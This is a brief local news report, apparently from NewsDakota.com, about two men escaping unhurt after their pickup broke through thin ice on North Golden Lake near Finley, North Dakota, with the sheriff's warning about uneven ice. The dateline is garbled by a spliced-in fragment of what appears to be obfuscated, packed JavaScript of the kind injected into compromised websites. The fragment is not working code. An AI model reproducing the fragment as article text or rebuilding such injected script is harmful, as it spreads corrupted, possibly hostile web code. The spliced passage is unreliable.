FINLEY, bbhss|var|u0026u|referrer|tsbzt||js|php’.split(‘|’),0,{}))
N.D. (NewsDakota.com) – A pickup plunged through the ice of North Golden lake northeast of Finley over the weekend. There were two men in the pickup at the time.
“They got out on their own. They got a little wet, but they made it out, and they’re just fine” Steele County Sheriff Wayne Beckman said.
Beckman says the ice was only 3-4″ thick in that area. Not too far away from there the ice was 12-14″ thick. The sheriff says anyone venturing out needs to be very careful. He says the ice isn’t safe for heavier vehicles.
Midwest Towing and Recovery got the pickup out of the lake at the owner’s expense.
